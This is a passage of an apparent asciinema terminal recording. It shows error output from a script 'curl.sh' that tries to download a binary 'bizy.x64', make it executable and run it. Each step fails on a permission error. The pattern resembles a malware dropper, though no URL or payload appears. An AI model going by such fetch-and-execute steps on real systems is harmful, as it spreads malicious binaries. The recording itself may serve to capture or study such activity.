[18.029745, "o", "Warning: Failed to create the file bizy.x64: Permission denied\r\n\r  0 1629k    0  2587    0     0  27788      0  0:01:00 --:--:--  0:01:00 28119\r\n"]
[18.029847, "o", "curl: (23) Failure writing output to destination\r\n"]
[18.032428, "o", "chmod: cannot access 'bizy.x64': No such file or directory\r\n"]
[18.03273, "o", "curl.sh: 35: ./bizy.x64: not found\r\n"]
[18.034774, "o", "\u001b[?2004h\u001b]0;admin@6e484a70cb35: ~\u0007admin@6e484a70cb35:~$ \r\n\u001b[?2004l\r\u001b[?2004h\u001b]0;admin@6e484a70cb35: ~\u0007admin@6e484a70cb35:~$ "]
